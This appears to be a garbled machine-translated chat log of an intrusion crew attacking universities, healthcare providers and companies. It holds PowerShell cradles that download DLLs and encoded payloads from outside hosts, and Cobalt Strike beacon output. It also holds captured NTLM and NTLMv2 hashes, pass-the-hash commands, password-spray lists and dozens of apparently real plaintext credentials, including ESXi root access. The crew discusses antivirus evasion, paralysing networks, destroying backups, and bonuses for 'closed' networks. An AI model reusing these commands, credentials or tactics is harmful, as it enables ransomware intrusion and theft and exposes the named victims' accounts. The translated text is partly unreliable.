``Postpone in the confines of the progress+new session in the input coba, by the requests of those waiting for the sessionAccess to the admin+there look for admin in the AV? What is in the work now? Good afternoonMorning in the hut.
i'll get it today thank youactivated his account back = )ah man
sec
I'll look now) He wanted to go, they did not let him go) Looks like someone closed access.so stop and he does not have? stupid here where to give access user8Hi! https://helpdocpt.club/вы already copied messages?) you just order the build.))but good night, until tomorrow night, until tomorrow we will close even by 6, most likely delayed until 2-3 nights tomorrow by 5 in general, that's the case if you do not interfere with AV describe what you did on the result is lazy) you settled on kerbenichego from this did not try, I will try to see, and what passes to try? i have a list of only 4-skul, zero, smbgost ?i have tried on all the cars to raise the rights, nowhere succeeded, under this type of creeds do not knock anywhere else, and the other polzak only in hashes rubeus, still waiting for them[ ](https://mediaeveryone.com/channel/general?msg=J48fTapGtCAQpMFL7) on all labs i.e. you have where to go? everything in the confedaad and other things is there? if the kerb is unbroken, you can further untwist there are places to work? on all machines (virtual labs) authorized under it (some sessions have hung, if you need to restore them) there are not up all eleveite in kobe tried there is where to dig?#humboldt-edu is the one where the user can only go to the virtual labs, AB there vindefostaet in your work then through tpsh you can remove hell and kerbs and other it and killed it after loading?[ ](https://mediaeveryone.com/channel/general?msg=db445S5oz7pEsAu9P) I went to rdp, ran kmd, in it ran your one-time command, went to tpsh, figured out the interface, wanted in cobalt dll, ran the attached string and got no response
I didn't get it off.
Didn't get a response from AB.
Didn't have time to try anything at all
The session in tpsh just died
```
 (New-Object System.Net.WebClient).DownloadFile('http://199.127.61.166:8080/A3z4km1/x64.dll', 'C:\Users\Healdton.IT\x64.dll')
``Minute@user7 av which? stop, this other one can't pull anywhere, AV breaks everything, user not LA[ ](https://mediaeveryone.com/channel/general?msg=Gx99ioxD6oZW5Wsff) but with a different way of loading?
https://vlab.humboldt.edu/rdweb/webclient/

```
@user7 here we have what? flew, after a short time - flew away tpsh come and go? by stg? yes, marked the second one you gave - the creeds did not fit in tpsh this was ``
https://tcph.stg-healthcare.com/rdweb/pages/en-us/login.aspx

```
is this one in your work? are the accesses working? so i need to re-save it@user8 then you still have work to do with it that's all i did outside the domain, i didn't pull it i wanted a dll in cobalt, ran the download in tps and no response did you pull the kerb? not working on it yet, i can't see what else can be done with it
work with ttps://lab.devry.edu/vpn/index.html have you got it working? only 1 subnet is visible, there polozaki@user8 there are 2 questions to you by the story vectors were not identified? have you tried different software dll load? i worked with the first one less than 10 minutes[ ](https://mediaeveryone.com/channel/general?msg=Pt2PsEG3K5iG8uZEa) on the dedik under wpn
no cracks.
Checked the network at ms17\bluekeeper\smbghost and nothing.
was the last option to find a dc and outside the domain to put a zerologon, but dc I have not found what?[ ](https://mediaeveryone.com/channel/general?msg=eybqLby5RFvccWeLS) do not know ``
https://tcph.stg-healthcare.com/rdweb/pages/en-us/login.aspx

```
@user8 what do we have here?
https://vpn.floridapoly.edu

```
also a question for you, what's up with you? okay, you wrote off her status, she's in the works I'm up to my neck in it
It's only possible to work with her through msf
even if i somehow miraculously get up to yes, then i do not know what to do at the stage of crypto) you have a working network? @user9nothing but vindef? another thing `https://ra.vdi.stevens.edu/vpn/index.html` no way to upload the load (coba/msf). Neither as an exe nor as a dll. I've uploaded via powershell and chrome. Everything chops vindef (notifications pop up)without a step asidewrite status on this gridno jump the topic)[ ](https://mediaeveryone.com/channel/general?msg=nrkt4e7hGZPTpaFL3) not a word about it so we are not about sisdbitdef in sisd.peta bitdef where?[ ](https://mediaeveryone.com/channel/general?msg=nrkt4e7hGZPTpaFL3) here only vindef but evil as hell - kills everything at the download stage, or launch in case of psh it chops cob, msf, psh dlls?@user4 you have a bitdef from the point of entry one by one you've confused me)and in the last one only vindef, well I have BitDefendernu apparently dai @user4 maccafi and you? everywhere macaficakoy av? through msfdllku can try to put thereada here does not work tpsh, I do not think that there and work if you throw through psec command load in tpsh?
tried windows/smb/psexec with these creds, the session dies

``So if there is a pass to the other PCs why did not go there? no, the list and a third of the list did not pass)
tried windows/smb/psexec with these creds, the session dies, and the admins(LA\DA\EA)`
i.e. hash yes? ``has hash LA, fits to several computers,``
what's there to brute-force? nothing but macafee? it's like they have some kind of iron that filters traffic...macafee[ ](https://mediaeveryone.com/channel/general?msg=82Pd9a83qxHBS58rX) similarly what av? dies right away[ ](https://mediaeveryone.com/channel/general?msg=H8dGzGbszpD4eYP5N) psh?[ ](https://mediaeveryone.com/channel/general?msg=KJaTThQteEaZH4rdJ) have a system, session in msf
i can't get a session in both coba and armia (different ports, pailoats) b in armia dies right away and will not reach coba
hash LA, fits to several computers, but the session dies when brute force (goes through a list of 40 pieces), proxy msf some unstable (rotate more precisely)
took off yes, and admins (LA\DA\EA) dll coba, dll msf. chopped at the stage of downloading all - what? all chopped by vindexhttp://ra.vdi.stevens.edu/vpn/index.html
@user4
what's up? ready@user9
https://lab.devry.edu/vpn/index.html
what do we have here? and in order clean the sessions and in slip we finish then half an hour a little meeting and summarize the results of the week another half hourTo what time today? to the coba not at all in the arma immediately fall off
different load ports and so on... i'm busy with mine
i'm trying to get somewhere from msf
i tried both coba and arma to throw a session - does not come in any wayNo software i left on the forum so far only guides for gui[ ](https://mediaeveryone.com/channel/general?msg=2iBBPTM4MjnX8vAWC) looking for how to bitdefender chop upa lot of you without a job?Who are you asking? Are you still sitting idle? Well, the first domain (`tcph.stg-healthcare.com`) in tpsh fell off, the second (`signature-healthcare.org`) - citra creed is not true so how are you doing there?if no one's writing anything like that, I won't even write about it here + your colleagues might have written it down - I won't repeat it to you - I already wrote it down, I'll go ask him [ ](https://mediaeveryone.com/channel/general?msg=yW7WJmRxFWEzg2apN) google second domain@user8
```
https://citrix.signature-healthcare.org/citrix/xenapp/auth/login.aspx md.raws 1984Bears
?where's the psh history file ?okzamenapz or can i help someone ?okpoka postponement)it's a one time thing i want a nickname, too ?
powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0ANAA4AHgAQQBlAEUAeQBaAHcAcgBGAGUAeABaADMAYQBWAHcAUgAzAHkASQBzADkASQBNAEcAOQBRADkATQBBAE0AZQBvADUASABWAGkARgAnACkAKQA7AA==
``Why is it the one you threw me off thepunks hoyrebytes give a one-time load the same command ?try tpshmmhom the alerts popped up that the dll worked successfully what is the sonar ?and kmd aksess fucking danila i can't get it in the kobe either so i don't use the load so it's always dirty `powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAWAA2ADMATwBpAFMAaABiAC8ASABQADgASwBQAHEAUgBLAHIAVABFAHUAUgBwAE8ASgBzAHoAVgBWAEEAdwBLAEsAQQBsAEUAZQB2AG4ASgBUAHEAUgBaAGEAUgBaAHUASAAwAEkAaAA0AFoALwA3ADMAZQAwAEQATgB6AGUAdwBrAHUAMQBPADEAdQAxAFoAUgBkAGoAZgBuACsAVAB1AFAAUABoAGkAWQAzAGgAZwAwAGMAbQAyAHEAQgBnADUAbQBiAHMAWQA0AGkAdAAzAEEAWgAyADUATABwAFcAcwBoAGsAQwBuAHoAbABmAGwAVwBMAGkAMABUADMANgBiADUAYwBiADUANABXAFcASAA2AEUAawBhAEIALwBZAEkAYwBKADgASgB4AHoAUAB4AFoAdQBoAHEAaQBDAEgAbABNADUAWABxAFAAbwBoAGMAdgBjAEIASwBDAGEAMAB5AHgAeQBRAG0AeABrADAAUwA0AGUAbgBWAFYAdQBpAHEATwBFAGoAOQBHAFMALwB6AGkASQArAHIAdQA4AFkAdQBIADYAVABwAHcAWQBsAEIAVQBlAGUATABDAFUAQQBnADgANQBQAHIAUABYADcANQAwAGsAaQBqAEMAUABqADMAdAA2ADEAMQBNAHUAVABqAEcAMwBvAEsANABPAEsANQBVAG0AZQAvAE0AWgBJADAAagBmAFAATwA0ADIARwBDAGIATQBuADgAeQAxAHkALwAxAEwAZwBrAFcAaQBKAHoASgBzAGcANgB5ADEAKwBBAFEANQB6AHYANQBPAHkAVwB3AFUAZQA1AEIA dacobs?[ ](https://mediaeveryone.com/channel/general?msg=7KEgBZjBYuarLgL2x) bicon in verashell format? well the one my colleagues tell me about :confused:i'm scared to ask what psh? hz in sisd dll blocked and psh work out if the psh load was fud why do we all dll updateable?and a follow up question so let your colleagues tell me about coba load in psh format) i'm already getting tired of repeatingpoverschel bicon what load? load, there is nothing but windef. and notifications pop upwhat is windef blocking? is windef blocking dll, wind is blocking windef, cmd is disabled by admin[ ](https://mediaeveryone.if you're not sure if vindef is blocking vindef,vindef is blocking dll,cmd is disabled by admin[ ](https://mediaeveryone.com/channel/general?msg=kXZRFtHSaMXjss6iw com/channel/general?msg=s2NX4qeezS7ze9vXQ) I[ ](https://mediaeveryone.com/channel/general?msg=kXZRFtHSaMXjss6iw) takelocham is not just using dll,just for the record, the coba load in psh format has been stolen and not cleaned and everything through verashell session to the coba,why download something and it can download files?it will not be easier to download a file? so why do you need to download a file in coba in a minute through psh and start downloading it in coba or you can immediately prepare a file in tpshzagi look what if it is empty now?[ ](https://mediaeveryone.com/channel/general?msg=wSoB94aWyKrhDgP3c) tsepvpvrzablitet 3 pieces
https://ra.vdi.stevens.edu/vpn/index.html amueller Lokifredd3133!

``````
https://remote.egr.msu.edu/rdweb/pages/en-us/login.aspx nguye680 Thewolf1901

``````
https://tcph.stg-healthcare.com/rdweb/pages/en-us/login.aspx healdton.it@stg-healthcare.com Oklahoma@2020!
``I think all 3 are free? Let's move onACADEMIC.NET no?[ ](https://mediaeveryone.com/channel/general?msg=yJF88nF88qByMt9Jd) Took LA\DA\Ea off, hell. I got the system up, but I can't get it to work in the coboo (80, 8080 ports with http lisener) and I opened 443 port and no session will come in ``History of my migration between domains
I opened a session with the rights `System` opened the list of processes and logged in to the administrator, took a list of hosts on the other domain and through the command `shell dir \\\[ip]\C$\Users` tried to determine where authorized was the DA, seeing that the list of directories is and filled dll through vmik run, at first (Friday) process runs but session did not come, today I tried again with re-criticized dll and session came, but then as usual hashdump + mimic and try to jump on the DC, all end, go away `SDFJ*H97yW*EFG7ysaEy9F*&sg8$ef84` update tulchanok, then work out so in work now?1 wait for us all came? i only change the names, logins will remain the old names i think this moment has comeDa[ ](https://mediaeveryone.com/channel/general?msg=yJF88nF88qByMt9Jd) what was it? port? and the network is also user3 me - ttps://lab.devry.edu/vpn/index.html
i tried to do it in the msf session (no cobu), i will try to move on with the second half of the day, i will give more net@user4 the first half of the day look for AV panel, search for technicians@user9 more specifics we have 3 networks in operation now in the sisd.k12 no approaches found. and in sisd.net if you don't take into account avers - everything seems to be readyTry new cresDetermine first what's done, what's being done, what's plannedWhat's the plan?
```
Administrator::.::F6F8AB934AB58AF9F64ABA9F742E52FB:0101000000000000003D92367296D60153E3AC54F3702C9F
00000000020016004400410054004100430045004E005400450052003200010016004400410054004100430045004E00540
0450052003200040016006400610074006100630065006E007400650072003200030016006400610074006100630065006E
00740065007200320007000800D8B23E357296D6010000000000000000
``a, okeyhash here)`` yes here it is, above. this is what invei caught the format what? overnight let's leave the brute and inveiprobruted with passwords from luiza, run invei - something caught, but hashtag does not take ....sploites want password from sa. now it's brute force already with rockyou wordrebrute whining and sploit? yes, in general, everything is as it was. how are things going here?
dimension::.::969615772484654CECA5175EAF959B4E:0101000000000000007193717096D601A59315971401D8FA0000
0000020016004400410054004100430045004E005400450052003200010016004400410054004100430045004E005400450
052003200040016006400610074006100630065006E007400650072003200030016006400610074006100630065006E0074
0065007200320007000800336BC76F7096D6010000000000000000

``````
[*] 10.20.4.0/24:445 - Scanned 256 of 256 hosts (100% complete)

``````
[*] 10.20.4.0/24:445 - Error: 10.20.4.34: RubySMB::Error::CommunicationError Read timeout expired when reading from the Socket (timeout=30)

``````IUSR_MATCHES01::.::39B6178D9AF43DD5120EC1A45969D0E0:0101000000000000003739696C96D60178CAE898183A8D5
800000000020016004400410054004100430045004E005400450052003200010016004400410054004100430045004E0054
00450052003200040016006400610074006100630065006E007400650072003200030016006400610074006100630065006
E007400650072003200070008001F77B0686C96D601000000000000000000000000```` I'll try DomainPasswordSpray to see if I can change something does not the domain itself can be polled? yes, but we are not in the domainIt pings the local domain available and send it once LDA requests as if you just register the domain in smbautobrute it does not cling to this domain?but domain users will not be collected so we can also look towards python utilities various times we have a context with the dedication is slow and does not collect domain users if there is visibility on the smb - then the best option here is probably smb_login module metasploitau us dedik not in the domain, and want to go through all networks domain with all domain users and the dictionary why? @tl2 Is there any password spray tool, which can manually specify the address ldap server?
User1-1 beacon> shell nslookup matchesfashion.com
[*] Tasked beacon to run: nslookup matchesfashion.com
[+] host called home, sent: 58 bytes
[+] received output:
Non-authoritative answer:

Server: UnKnown
Address: fdb0:64:3df8:0:7e4c:a5ff:fef9:c2a0

Name: matchesfashion.com.matches.com
Address: 204.74.99.100
``````
User1-1 beacon> shell arp -a
[*] Tasked beacon to run: arp -a
[+] host called home, sent: 37 bytes
[+] received output:

Interface: 192.168.0.80 --- 0xb
  Internet Address Physical Address Type
  192.168.0.1 7c-4c-a5-f9-c2-a0 dynamic
  192.168.0.15 a4-77-33-15-41-a0 dynamic
  192.168.0.255 ff-ff-ff-ff-ff-ff static
  224.0.0.2 01-00-5e-00-00-02 static
  224.0.0.22 01-00-5e-00-00-16 static
  224.0.0.251 01-00-5e-00-00-fb static
  224.0.0.252 01-00-5e-00-00-fc static
  224.0.0.253 01-00-5e-00-00-fd static
  239.255.255.250 01-00-5e-7f-ff-fa static
  255.255.255.255.255 ff-ff-ff-ff-ff-ff static
``````
FortiNet

User1-2 beacon> shell type setting.ini
[*] Tasked beacon to run: type setting.ini
[+] host called home, sent: 47 bytes
[+] received output:
[CONFIG]
CATEGORY=BROWSER;OFFICE;PDF;JAVA;MISC

[TRACK]
BROWSER=firefox.exe;chrome.exe;iexplore.exe;opera.exe;plugin-container.exe;opera_plugin_wrapper.exe;opera_plugin_wrapper_32.exe;FlashPlayerPlugin_*.exe
OFFICE=powerpnt.exe;winword.exe;excel.exe;EQNEDT32.exe
PDF=acrord32.exe;acrobat.exe;foxit reader.exe
JAVA=java.exe;javaw.exe;javaws.exe
MISC=helpctr.exe;hh.exe;wscript.exe;winhlp32.exe;loaddll.exe

[DANGEROUS]
BROWSER=wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
OFFICE=cmd.exe;wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
PDF=cmd.exe;wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
JAVA=wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
MISC=powershell.exe;net.exe;regsvr32.exe

[PROTECTION]
FLAGS=0

[REACTION]
MODE=0

[DESCRIPTIONS]
firefox.exe=Mozilla Firefox
chrome.exe=Google Chrome
iexplore.exe=Internet Explorer
opera.exe=Opera Internet Browser
plugin-container.exe=Plugin Container for Firefox
opera_plugin_wrapper.exe=Opera Internet Browser Plugin Wrapper
opera_plugin_wrapper_32.exe=Opera Internet Browser Plugin Wrapper (32 bit)
FlashPlayerPlugin_*.exe=Adobe Flash Player Plugin
powerpnt.exe=Microsoft PowerPoint
winword.exe=Microsoft Word
excel.exe=Microsoft Excel
acrord32.exe=Adobe Acrobat Reader
acrobat.exe=Adobe Acrobat
foxit reader.exe=Foxit Reader
java.exe=Java Platform SE
javaw.exe=Java Platform SE
javaws.exe=Java Web Start Launcher
helpctr.exe=Microsoft Help and Support Center
hh.exe=Microsoft HTML Help Executable
wscript.exe=Microsoft Windows Based Script Host
winhlp32.exe=Windows Help
loaddll.exe=LoadDll
cscript.exe=Microsoft Console Based Script Host
powershell.exe=Windows Powershell
net.exe=Windows Net Command
regsvr32.exe=Microsoft Register Server
cmd.exe=Windows Command Processor
dw20.exe=Microsoft Application Error Reporting
eqnedt32.exe=Microsoft Equation Editor
``````
User1-2 beacon> shell route print -4
[*] Tasked beacon to run: route print -4
[+] host called home, sent: 45 bytes
[+] received output:
===========================================================================
Interface List
 10...00 09 0f aa 00 01 ......Fortinet SSL VPN Virtual Ethernet Adapter
 14...00 68 eb 67 1a a2 ......Intel(R) Ethernet Connection (6) I219-V
 22...04 ed 33 e4 5f 2b ......Microsoft Wi-Fi Direct Virtual Adapter
  7...06 ed 33 e4 5f 2a ......Microsoft Wi-Fi Direct Virtual Adapter #2
 18...00 09 0f fe 00 01 ......Fortinet Virtual Ethernet Adapter (NDIS 6.30)
 11...04 ed 33 e4 5f 2a ......Intel(R) Wi-Fi 6 AX200 160MHz
  1...........................Software Loopback Interface 1
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
          0.0.0.0 0.0.0.0 192.168.0.1 192.168.0.80 50
        127.0.0.0.0 255.0.0 On-link 127.0.0.1 331
        127.0.0.1 255.255.255.255.255 On-link 127.0.0.1 331
  127.255.255.255.255.255.255.255 On-link 127.0.0.1 331
      192.168.0.0 255.255.255.0 On-link 192.168.0.80 306
     192.168.0.80 255.255.255.255.255 On-link 192.168.0.80 306
    192.168.0.255 255.255.255.255 On-link 192.168.0.80 306
        224.0.0.0.0 240.0.0.0 On-link 127.0.0.1 331
        224.0.0.0.0 240.0.0.0 On-link 192.168.0.80 306
  255.255.255.255.255.255.255.255 On-link 127.0.0.1 331
  255.255.255.255.255.255.255.255 On-link 192.168.0.80 306
===========================================================================
Persistent Routes:
  None
``````
User1-2 beacon> shell net share
[*] Tasked beacon to run: net share
[+] host called home, sent: 40 bytes
[+] received output:

Share name Resource Remark

-------------------------------------------------------------------------------
C$ C:\ Default share
IPC$ Remote IPC
ADMIN$ C:\windows Remote Admin
The command completed successfully.
The ``pinged sql-keys
```
AWS-VTBCSQL01.matches.com [10.7.19.25]
EC2AMAZ-U49LCLF.matches.com [10.1.4.4]
AWS-VTBIMSTRI03.matches.com [10.7.18.36]
``OK.'' Then I suggest the following:
- try to connect it to the wpn
- gather from ad_comps list all the mssql servers and try sa account or try to solidify the dedicata would be fun and turn on the vpn at this point also, how do you connect? well yesterday the keylogger showed that she went to netflix to see idletimea for example by timea how do you determine?so she didn't notice any abnormal activity. the important thing is to log in when she's not there. so the point is to log in to her pc under her access and enable yourself some wpn on some other machines. did you try to connect to the dc? did you try to get her in the remote dc group? adfind did not work. did you get it off with a turn-by-turn info? did you get it off on all the dc's?
```
M@tches2020!
M@tches2020!
M@tches2020
Matches2014
matches123
matches123!
matches123!!!
m@tches123
m@tches123!
m@tches123!!!
Matches123!
Matches123!
Matches123!!!
M@tches123
M@tches123!
M@tches123!
tried yesterday tried if she is asleep now you can go to her on the rdp and connect to the domain can try it on YES polzakov with a limit on the number of attemptsdid you get a dictionary for brute force in the process? and brute what? and her computer in the domaine pk also not in the domain as an option to try brutePo no information on the connection console6+she has a new version?she seems to connect when she needs access to network drives for the old version we know ... can you check if the user is not currently connected to the console version you do not know? we have a tunnel through the VPN to the subnet from where you can access the DC. But we can not do anything well from the fact that our computer is not in the domain. Plus the user is not an administrator. Inveeem also can not catch anything. In addition there are balls available to write. Yesterday we wanted to replace the labels in them, but not yet - not sure that the idea is good. In general, the situation so far stalemate. Maybe there is a solution, where to go in such a situation?
```
svc_egnyteelc
sccmadmin
svc_ntbackup
Jacquesv.adm
georger.adm
sev_eset
svc_becrypt
OktaService
Karlns.adm
eo.adm
svc_admonitor
MSSQLSvc
``We should have at least some kind of feedback on the networks, what is closed and what is not, so there would be no such situations, provided that now we know that for closed networks there are bonuses for 2 networks there were definitely bonuses, i remember it)))) we had a few bonuses after training and one before january, when asked what the bonus for - "for a good mood" i think i said that one was i was told that you had bonuses for closed nets + one second@tl1 please add me in `sccy.com` without fuck-ups so let's fuck up the quality, in the end everyone will be on the plus side, so do it from 1 time we do not do anything offline([ ](https://mediaeveryone.com/channel/general?msg=vEoyyyPTRZASh5wawE) not the fact that there was no offline backups all rolled back[ ](https://mediaeveryone.com/channel/general?msg=4XdGzRpcrmrzHu5tS) And if we finish with 2 times?well, let's just say that successfully = a no-fail network, completely paralyzedThe question of premiums until today will be solved today. now more motivated. today I personally vouch for the premiums on successfully closed nets, draw a line[ ](https://mediaeveryone.com/channel/general?msg=vhL4vfKYsfxCcf5aw) The answer is always the same! What I was given out I handed out[ ](https://mediaeveryone.com/channel/general?msg=LsgvAKoGPEi5SQnyN) the question to him, you are there amateur activity about which no one knows but you)[ ](https://mediaeveryone.com/channel/general?msg=eybcR4z8WdwBXQkBn) the Offices got it, we'll be more vigilant and make more effort, I hope our efforts will not go unnoticed or wait, I got 2 or 3 thousand that month more than others, but I spent at work and gasoline for 4)[ ](https://mediaeveryone.com/channel/general?msg=6BB4Mq2pKZ4QZTpoh) who promised? Let's say they promised me a prize for the forum, I fucked 3 days off doing the forum. i got nothingwhen there should be at least 2 let's say even 1 so is 1 prize a reason to say that they have? about bonuses the question is open i also remember it, but @user3 maybe not thim lidovna but you who did not congratulate?) the new year was not even congratulated before january recently have not fucking closed if i'm right probably will come to you now specify about bonuses or we fucking have not closed?Where are they? What bonuses? Seriously? This is the first time we've heard, I honestly don't understand. you get bonuses for successfully closed networks. don't you need them? hello there, what are we working on? good nightbz tomorrow by 4 more hour work in #ballymoregroup-com turned off the VPN, it was not found, other machines could not get
then helped in #sccy-com jumped on the cars, where they sit guys who in theory go to the nas - deaf, the creeds from them in the search.
Username : dcha
Domain : RTPCO
Password : 11Saundra
``ESXi outside domains
```
Name :
esxicrockett1.us.alloypolymers.com
esxicrockett2.us.alloypolymers.com
esxifrance1.rtpco.local
esxifrance2.rtpco.local
esxihend1.rtpco.local
esxiindy1.rtpco.local
esxiindy2.rtpco.local
esximanage.rtpco.local
esximanage2.rtpco.local
esximexico2.rtpco.local
esximn1.rtpco.local
esximn2.rtpco.local
esximn3.rtpco.local
esximn4.rtpco.local
esximn5.rtpco.local
esximnrp1.rtpco.local
esximnrp2.rtpco.local
esxiohio1.rtpco.local
esxiohio2.rtpco.local
esxiorange1.us.alloypolymers.com
esxiorange2.us.alloypolymers.com
esxipoland1.rtpco.local
esxipoland2.rtpco.local
esxiredwing1.rtpco.local
esxiredwing2.rtpco.local
esxisg1.rtpco.local
esxisg2.rtpco.local
esxishenzhen1.rtpco.local
esxishenzhen2.rtpco.local
esxisuzhou1.rtpco.local
esxisuzhou2.rtpco.local
esxitexas1.rtpco.local
esxitexas2.rtpco.local
esxiva1.rtpco.local
esxiva2.rtpco.local

```
And creeds for them
```
Username : root
Password : dropCod5
``````
Username : bstangea
Domain : RTPCO
Password : pL@yTyme!

Username : AXSQLSERVC
Domain : WINONA
Password : gg5bvq

Username : tmusta
Domain : RTPCO
Password : 27Singapore

Username : cwwestby
Domain : RTPCO
Password : Plastics16

Username : marcom
Domain : RTPCO
Password : Rtp5802023!

Username : jesmith
Domain : RTPCO
Password : Nascar1020

Username : jmierau
Domain : RTPCO
Password : 3Brian4Becky

Username : corr
Domain : RTPCO
Password : 00sthomas,

Username : pvcimpro
Domain : RTPCO
Password : 4qbuyh

Username : dpflughoeft
Domain : RTPCO
Password : BabyYoda123

Username : mmohr
Domain : RTPCO
Password : Welcome123

Username : AxAdmin
Domain : RTPCO
Password : gg5bvq

Username : WINONA\Administrator
Domain : WINONA\Administrator
Password : DA7PaM8h

Username : lmiller
Domain : RTPCO
Password : 2101Ronnie
``rtp
```
>memberOf : CN=VEEAMAdmins

bbuerck
 ```
```
>memberOf: CN=VEEAMUsers

dch
wstange
 ```
```
>sAMAccountName: veeam_service
>sAMAccountName: vmbackup
``.Passed in both trusts (in alloy to server, in winona to dk)
```
pth rtpco\vmbackup 2212f99d3c73ac885850545c544072af
```

YES to alloy.
```
	 * Username : wstangea
	 * Domain : ALLOY
	 * NTLM : 652805d304727fa73d6c4c7cfef31986
 
	 * Username : wstangea
	 * Domain : us.alloypolymers.com
	 * Password : Calib3r9
```
```
	 * Username : Administrator
	 * Domain : ALLOY
	 * NTLM : 66ac9a770e02cfdded6d5bd957a774fb
``alloy:
```
>dNSHostName : AlloyVM01.us.alloypolymers.com
>operatingSystem: Windows Server 2003
 
Ping request could not find host AlloyVM01.us.alloypolymers.com. Please check the name and try again.
```
 


rtpco:
```
>operatingSystem: Windows Server 2012 R2 Standard
>dNSHostName: HendVeeam.rtpco.local
 
Ping statistics for 10.25.0.21:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>operatingSystem: Windows Server 2008 R2 Standard
>dNSHostName: OHIOVEEAM.rtpco.local
 
Destination host unreachable.
 
Ping statistics for 10.1.10.9:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>operatingSystem: Windows Server 2012 R2 Standard
>dNSHostName: INVeeam.rtpco.local
 
Destination host unreachable.
 
Ping statistics for 10.59.0.21:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: test-bs-vm.rtpco.local
>operatingSystem: Windows Server 2019 Standard
 
Ping statistics for 10.89.11.19:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>operatingSystem: Windows Server 2016 Standard
>dNSHostName: nevadahypv1.rtpco.local
 
Ping statistics for 10.57.2.233:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: Kaseya.rtpco.local
>operatingSystem: Windows Server 2016 Datacenter
 
Ping statistics for 10.89.11.24:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
 


 
winona:
```
>dNSHostName: Orion5.winona.rtpco.local
>operatingSystem: Windows Server 2003
>memberOf: CN=Storage2_SQLBackups_RW
 
Ping statistics for 89.0.191.194:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: AXDEV10.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Datacenter
>memberOf: CN=Storage2_SQLBackups_RW
 
Ping statistics for 10.89.0.61:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
```
```
>dNSHostName: AXSQL-TRN.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Standard
>memberOf: CN=Storage2_SQLBackups_RW
 
Ping statistics for 10.89.0.52:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: SuperOnContact.winona.rtpco.local
>operatingSystem: Windows Server� 2008 Standard
>memberOf: CN=Storage2_SQLBackups_RW
 
Ping statistics for 89.0.0.33:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: AXSQL-PROD-OLD.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Enterprise
>memberOf: CN=Storage2_SQLBackups_RW
 
Ping statistics for 10.89.0.200:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: SQLSRV1.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Standard
>memberOf: CN=Storage2_SQLBackups_RW
 
Ping statistics for 89.0.0.121:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: vmwaremgr.winona.rtpco.local
>operatingSystem: unknown
 
Destination host unreachable.
 
Ping statistics for 89.0.55.9:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
```
```
>dNSHostName: CitrixVM6.winona.rtpco.local
>operatingSystem: Windows Server 2012 R2 Datacenter
 
Ping statistics for 10.89.0.155:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: CitrixVM5.winona.rtpco.local
>operatingSystem: Windows Server 2012 R2 Datacenter
 
Ping statistics for 10.89.0.154:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: CitrixVM4.winona.rtpco.local
>operatingSystem: Windows Server 2012 R2 Datacenter
 
Ping statistics for 10.89.0.153:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: historianvm.winona.rtpco.local
>operatingSystem: Windows Server 2003
 
Ping statistics for 89.0.192.96:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: CITRIXVM1.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Standard
 
Ping statistics for 10.89.0.150:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: CITRIXVM2.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Standard
 
Ping statistics for 10.89.0.151:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: CITRIXVM3.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Standard
 
Ping statistics for 10.89.0.152:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: CITRIXVMONC2.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Datacenter
 
Ping statistics for 10.89.0.161:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```
```
>dNSHostName: CITRIXVMONC1.winona.rtpco.local
>operatingSystem: Windows Server 2008 R2 Datacenter
 
Ping statistics for 10.89.0.160:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
``````
https://vmwaremgr.winona.rtpco.local
https://vc1.rtpco.local/websso/SAML2/SSO/vsphere.local

